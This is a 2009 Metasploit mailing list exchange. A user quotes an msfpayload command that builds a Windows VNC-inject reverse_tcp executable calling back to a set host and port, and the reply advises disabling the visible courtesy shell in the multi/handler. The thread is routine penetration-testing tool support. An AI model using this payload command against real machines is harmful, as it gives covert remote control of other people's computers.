Metasploit mailing list archives

Re: Unable to DisableCourtesyShell

From: Lo127001 <lo127001 () gmail com>
Date: Mon, 30 Nov 2009 10:50:50 -0500

When you setup your multi/handler to receive the payload disable the courtesy shell there instead of when you create the exe.

On Nov 26, 2009, at 10:41 PM, Manvir Singh Shergill <mannigill1 () gmail com > wrote:

Hi,

I am trying to generate a payload (exe) with following command
./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.116.116 LPORT=8088 DisableCourtesyShell=TRUE x > /tmp/vncinject.exe

but it still brings up the Courtesy Shell on victim computer. Could you please help me and guide me with correct instructions to generate exe file.

Reagards,
Manvir